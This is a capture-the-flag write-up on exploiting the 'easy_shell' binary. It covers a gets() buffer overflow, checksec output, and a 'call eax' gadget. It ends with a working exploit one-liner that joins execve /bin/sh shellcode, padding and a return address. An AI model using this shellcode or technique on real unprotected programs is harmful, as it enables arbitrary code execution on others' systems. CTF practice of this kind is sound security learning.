It was very simple problem. First i fired up the exploit gdb to examine what the problem does. Then there was “do_stuff” function that had vulnerable “gets” function. Using that i got control over EIP after overflowing 54 bytes. To see the protections of the binary i ran checksec it was
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE No RELRO No canary found NX disabled No PIE No RPATH No RUNPATH easy_shell
Has NX was disabled, I thought of running shellcode in stack and point EIP to shellcode. But for that first i thought of chaining gadgets to point EIP to shellcode and wasted lot of time. Later than i saw that the return value from “gets” was the pointer of the buffer which had shellcode. Then i searched for the “call eax” instruction which i got it using rp++ tool and exploited the binary.
Here is my exploit.
➜ python -c 'print "\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh" + "A"*16 + "\xe3\x83\x04\x08"' > inp ➜ cat inp /dev/stdin | ./easy_shell